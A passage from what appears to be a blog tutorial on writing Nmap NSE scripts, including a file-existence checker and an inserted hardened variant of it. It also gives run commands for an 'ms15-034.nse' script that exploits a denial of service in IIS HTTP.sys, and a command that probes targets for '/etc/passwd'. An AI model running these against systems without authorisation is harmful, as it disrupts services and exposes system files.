portrule <span class="sy0" style="color: #66cc66;">=</span> shortport<span class="sy0" style="color: #66cc66;">.</span>port_or_service<span class="br0" style="color: #66cc66;">(</span><span class="br0" style="color: #66cc66;">{</span><span class="nu0" style="color: #cc66cc;">80</span><span class="br0" style="color: #66cc66;">}</span><span class="sy0" style="color: #66cc66;">,</span> <span class="st0" style="color: #ff6666;">"http"</span><span class="sy0" style="color: #66cc66;">,</span> <span class="st0" style="color: #ff6666;">"tcp"</span><span class="sy0" style="color: #66cc66;">,</span> <span class="st0" style="color: #ff6666;">"open"</span><span class="br0" style="color: #66cc66;">)</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- Search for the string stored in the script argument @args.file, or use the default</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">local</span> file <span class="sy0" style="color: #66cc66;">=</span> stdnse<span class="sy0" style="color: #66cc66;">.</span>get_script_args<span class="br0" style="color: #66cc66;">(</span>SCRIPT_NAME<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">".file"</span><span class="br0" style="color: #66cc66;">)</span> <span class="kw2" style="color: #aa9900; font-weight: bold;">or</span> <span class="st0" style="color: #ff6666;">"/robots.txt"</span></div>
</li>
</ol>
</center>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: red;">Description: </span>the 'shortport' library uses the 'port_or_service' function so that 'the action section' only runs when every value matches (port 80, tcp, http, open); 'stdnse.get_script_args' reads what was passed in the script argument (and checks for that path), or otherwise falls back to the default value (/robots.txt) when the '--script-args file=' flag is not used.</div>
<center>
<span style="color: red;">'shortport.port_or_service': </span><a href="https://nmap.org/nsedoc/lib/shortport.html#port_or_service" target="_blank">nsedoc/lib/shortport.html#port_or_service</a></center>
<center>
<span style="color: red;">'stdnse.get_script_args': </span><a href="http://nmap.org/nsedoc/lib/stdnse.html#get_script_args" target="_blank">nsedoc/lib/stdnse.html#get_script_args</a></center>
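<div class="separator" style="clear: both; text-align: left;">
An added example, not the original file-checker.nse and not code from r00t-3xp10it, that combines the rules section above and the action section that follows into one hardened script. It uses shortport.http so the check also runs on 443, 8080 and any other port Nmap fingerprinted as HTTP, looks the status codes up in a table instead of a chain of elseif branches, validates the script argument before it is placed in the request line, does not follow redirects (so a 302 is reported as a 302), and reports a failed request (status nil) instead of crashing on the string concatenation. The redirect_ok option of http.get, stdnse.output_table, the "status-line" field of a failed response and the file name example-file-check.nse (which fixes the argument name example-file-check.file) are assumptions about the Nmap 7.x libraries, not something the post states.</div>

```lua
-- Added example, not the post's file-checker.nse: a hardened rules/action pattern.
-- Save as example-file-check.nse (assumed name) and run, e.g.:
--   nmap -sS -Pn -p 80,443,8080 --script ./example-file-check.nse \
--        --script-args example-file-check.file=/privacy/ TARGET
local shortport = require "shortport"
local stdnse    = require "stdnse"
local http      = require "http"

description = [[
Checks whether a path exists on an HTTP service and reports the HTTP status
code. Hardened variant of the file-checker.nse pattern, added as an example.
]]

author     = "example author (assumed; not part of file-checker.nse)"
license    = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"discovery", "safe"}

-- Rules section: run wherever Nmap saw an HTTP service, not only on 80/tcp.
portrule = shortport.http

-- Status codes the script describes; anything else hits the generic branch.
local STATUS_TEXT = {
  [200] = "STRING FOUND (200 OK)",
  [302] = "Redirected (302 Found)",
  [400] = "Bad Request (400)",
  [401] = "Unauthorized (401)",
  [403] = "Forbidden (403)",
  [404] = "STRING NOT FOUND (404)",
  [503] = "Service Unavailable (503)",
}

-- Accept only a plain absolute path: a value with whitespace or a full URL
-- would produce a malformed request line.
local function sanitize_path(p)
  if type(p) ~= "string" or p == "" then return nil end
  if p:find("%s") or p:find("^%a+://") then return nil end
  if p:sub(1, 1) ~= "/" then p = "/" .. p end
  return p
end

action = function(host, port)
  local arg  = stdnse.get_script_args(SCRIPT_NAME .. ".file")
  local path = sanitize_path(arg or "/robots.txt")
  if not path then
    return "invalid value for " .. SCRIPT_NAME .. ".file"
  end

  -- redirect_ok = false (assumed option name) stops http.get from following
  -- a 302, so the redirect itself is what gets reported.
  local response = http.get(host, port, path, {redirect_ok = false})

  local out = stdnse.output_table()
  out.path = path

  -- On a failed request (timeout, refused, TLS error) status is nil; the
  -- original script would raise "attempt to concatenate a nil value" here.
  if not response or not response.status then
    out.result = "no HTTP response: "
      .. tostring(response and response["status-line"] or "connection failed")
    return out
  end

  out.status = response.status
  out.result = STATUS_TEXT[response.status] or ("UNDEFINED (" .. response.status .. ")")
  if response.status == 302 and response.header and response.header.location then
    out.location = response.header.location
  end
  return out
end
```

<div class="separator" style="clear: both; text-align: left;">
Returning a stdnse.output_table lets Nmap render the same result as structured XML output (-oX) as well as the text block shown in the post, which matters when the check is run across many hosts and the results are fed to another tool.</div>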
<center>
<span style="text-align: center;"><br /></span></center>
<center>
---'THE ACTION SECTION'---</center>
<center>
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px; text-align: start;">
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
action <span class="sy0" style="color: #66cc66;">=</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">function</span><span class="br0" style="color: #66cc66;">(</span>host<span class="sy0" style="color: #66cc66;">,</span> port<span class="br0" style="color: #66cc66;">)</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">local</span> response <span class="sy0" style="color: #66cc66;">=</span> http<span class="sy0" style="color: #66cc66;">.</span>get<span class="br0" style="color: #66cc66;">(</span>host<span class="sy0" style="color: #66cc66;">,</span> port<span class="sy0" style="color: #66cc66;">,</span> file<span class="br0" style="color: #66cc66;">)</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- Check the HTTP status code of the response to determine if the file exists</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">if</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">200</span> <span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> file<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">"<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : STRING FOUND...<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : returned 200 OK<span class="es1" style="color: #000099; font-weight: bold;">\n</span>"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">elseif</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">400</span> <span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> file<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">"<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : BadRequest...<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : returned 400 BadRequest<span class="es1" style="color: #000099; font-weight: bold;">\n</span>"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">elseif</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">302</span> <span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> file<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">"<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : Redirected...<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : returned 302 Redirected<span class="es1" style="color: #000099; font-weight: bold;">\n</span>"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">elseif</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">401</span> <span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> file<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">"<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : Unauthorized...<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : returned 401 Unauthorized<span class="es1" style="color: #000099; font-weight: bold;">\n</span>"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">elseif</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">404</span> <span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> file<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">"<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : STRING NOT FOUND...<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : returned 404 NOT FOUND<span class="es1" style="color: #000099; font-weight: bold;">\n</span>"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">elseif</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">403</span> <span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> file<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">"<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : Forbidden...<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : returned 403 Forbidden<span class="es1" style="color: #000099; font-weight: bold;">\n</span>"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">elseif</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">503</span> <span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> file<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">"<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : Service_unavailable...<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : returned 503 Service_unavailable<span class="es1" style="color: #000099; font-weight: bold;">\n</span>"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">else</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> file<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">"<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : UNDEFINED ERROR...<span class="es1" style="color: #000099; font-weight: bold;">\n</span> : returned "</span><span class="sy0" style="color: #66cc66;">..</span><span class="kw3" style="color: #0000aa;">tostring</span><span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status<span class="br0" style="color: #66cc66;">)</span><span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">"<span class="es1" style="color: #000099; font-weight: bold;">\n</span>"</span> <span class="co1" style="color: grey; font-style: italic;">-- tostring: status is nil when no HTTP reply arrived</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">end</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">end</span></div>
</li>
</ol>
</center>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<span style="color: red;">Description: </span>the function 'action = function(host, port)' runs the commands against the <target>; next, the 'http.get' library call fetches a resource with a GET request, the NSE API field 'response.status' checks the return code of the google API to determine whether the file exists, and we use 'return' to display the output...</div>
<center>
<span style="color: red;">'http.get': <a href="http://nmap.org/nsedoc/lib/http.html#get" target="_blank">nmap.org/nsedoc/lib/http.html#get</a></span></center>
<center>
</center>
<span style="font-size: large; text-align: -webkit-center;"></span><br />
<center>
<span style="font-size: large; text-align: -webkit-center;">file-checker.nse output:</span></center>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh02UFs9-6W4w1Bx2R9c8E0-S0ap_bUFdAU65d47Ui8CXxozaTQ8kHFRo_efYnM5shfXiNbNbDRTwQsi2qaCl8-5tIRQRxorbYf06vMezlPDOgvhYG8txXvaGMyxszYpAu9g_Nx1HN5lsc/s1600/loool.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="206" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh02UFs9-6W4w1Bx2R9c8E0-S0ap_bUFdAU65d47Ui8CXxozaTQ8kHFRo_efYnM5shfXiNbNbDRTwQsi2qaCl8-5tIRQRxorbYf06vMezlPDOgvhYG8txXvaGMyxszYpAu9g_Nx1HN5lsc/s640/loool.png" width="640" /></a></div>
<center>
</center>
<center>
<div>
<center style="text-align: center;">
<b>download file-checker.nse:</b> <a href="http://pastebin.com/9rGkpmDR" target="_blank">file-checker.nse</a></center>
<center>
<div style="text-align: start;">
<div style="text-align: center;">
<b>export the script to nmap's script database</b> ('/nmap/scripts/' folder)</div>
</div>
<div style="text-align: start;">
<div style="text-align: center;">
sudo cp file-checker.nse /usr/share/nmap/scripts/file-checker.nse</div>
</div>
<div style="text-align: start;">
<div style="text-align: center;">
<b>update the NSE database</b></div>
</div>
<div style="text-align: start;">
<div style="text-align: center;">
sudo nmap --script-updatedb</div>
</div>
<div style="text-align: start;">
<div style="text-align: center;">
<b>view the module description</b></div>
</div>
<div style="text-align: start;">
<div style="text-align: center;">
sudo nmap --script-help file-checker.nse</div>
</div>
<div style="text-align: start;">
<div style="text-align: center;">
<b>run the script</b></div>
</div>
<div style="text-align: start;">
<div style="text-align: center;">
sudo nmap -sV -Pn -p 80,443,445,8080 --script file-checker.nse <target></div>
<div style="text-align: center;">
sudo nmap -sV -Pn -p 80,443,445,8080 --script file-checker.nse --script-args file=/etc/passwd <target></div>
<br /></div>
</center>
</div>
<h2>
<span style="color: red; font-size: large;">ms15-034.nse</span></h2>
<div>
<div>
Detects the MS15-034 (HTTP.sys) vulnerability on Microsoft IIS servers and exploits the denial-of-service condition via script arguments (--script-args D0S=exploit); we can also check (scan) further using another argument (--script-args uri=/wellcome.png). The 'default' behaviour is to check for the presence of the vulnerability; only when the D0S argument (--script-args D0S=exploit) is supplied is the denial-of-service exploited.</div>
<div>
Affected versions are Windows 7, 8, 8.1, Windows Server 2008 R2, 2012 and 2012 R2.<br />
<span style="color: red;">An analysis of ms15-034:</span> <a href="http://www.securitysift.com/an-analysis-of-ms15-034/" target="_blank">an-analysis-of-ms15-034</a><br />
<br />
<br /></div>
</div>
<div style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/a7VRCoZcpT0/0.jpg" frameborder="0" height="380" src="https://www.youtube.com/embed/a7VRCoZcpT0?feature=player_embedded" width="85%"></iframe></div>
<div>
<br /></div>
<div>
<div style="-webkit-text-stroke-width: 0px; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: -webkit-center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<div style="text-align: center;">
<b>1º - download ms15-034.nse: </b><a href="http://pastebin.com/ygMTiDKp" target="_blank">ms15-034.nse</a></div>
</div>
<div style="text-align: start;">
<div style="margin: 0px;">
<div style="text-align: center;">
<b> 2º - export the script to nmap's script database</b> ('/nmap/scripts/' folder)</div>
</div>
</div>
<div style="text-align: start;">
<div style="margin: 0px;">
<div style="text-align: center;">
sudo cp ms15-034.nse /usr/share/nmap/scripts/ms15-034.nse</div>
</div>
</div>
<div style="text-align: start;">
<div style="margin: 0px;">
<div style="text-align: center;">
<b>3º - update the NSE database</b></div>
</div>
</div>
<div style="text-align: start;">
<div style="margin: 0px;">
<div style="text-align: center;">
sudo nmap --script-updatedb</div>
</div>
</div>
<div style="text-align: start;">
<div style="margin: 0px;">
<div style="text-align: center;">
<b>4º - view the module description</b></div>
</div>
</div>
<div style="text-align: start;">
<div style="margin: 0px;">
<div style="text-align: center;">
sudo nmap --script-help ms15-034.nse</div>
</div>
</div>
<div style="text-align: start;">
<div style="margin: 0px;">
<div style="text-align: center;">
<b>5º - run the script</b></div>
</div>
</div>
<div style="text-align: start;">
<div style="margin: 0px;">
<div style="text-align: center;">
sudo nmap -sV -Pn -p 80 --script ms15-034.nse <target></div>
</div>
<div style="margin: 0px;">
<div style="text-align: center;">
sudo nmap -sV -Pn -p 80,443,445,8080 --script ms15-034.nse --script-args D0S=exploit <target></div>
</div>
</div>
</div>
</div>
<div style="text-align: center;">
<br /></div>
<br />
<br />
<h2>
<span style="color: red; font-size: large;">How To Display outputs:</span></h2>
<div>
<b></b><br />
<center>
<b>using return</b></center>
</div>
<div>
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px; text-align: start;">
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: grey; font-style: italic;">-- writing output to table (using return)</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">if</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">200</span><span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> file<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">" FOUND..."</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">elseif</span> <span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status <span class="sy0" style="color: #66cc66;">==</span> <span class="nu0" style="color: #cc66cc;">404</span><span class="br0" style="color: #66cc66;">)</span> <span class="kw1" style="color: #aa9900; font-weight: bold;">then</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> file<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">" NOT FOUND..."</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">else</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">return</span> file<span class="sy0" style="color: #66cc66;">..</span><span class="st0" style="color: #ff6666;">" undefined"</span><span class="sy0" style="color: #66cc66;">..</span><span class="kw3" style="color: #0000aa;">tostring</span><span class="br0" style="color: #66cc66;">(</span>response<span class="sy0" style="color: #66cc66;">.</span>status<span class="br0" style="color: #66cc66;">)</span> <span class="co1" style="color: grey; font-style: italic;">-- tostring guards against a nil status</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">end</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #aa9900; font-weight: bold;">end</span></div>
</li>
</ol>
<div style="text-align: start;">
<b><br /></b></div>
<div style="text-align: start;">
<b><br /></b></div>
<div style="text-align: start;">
<b></b><br />
<center>
<b>using table.insert</b></center>
</div>
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px; text-align: start;">
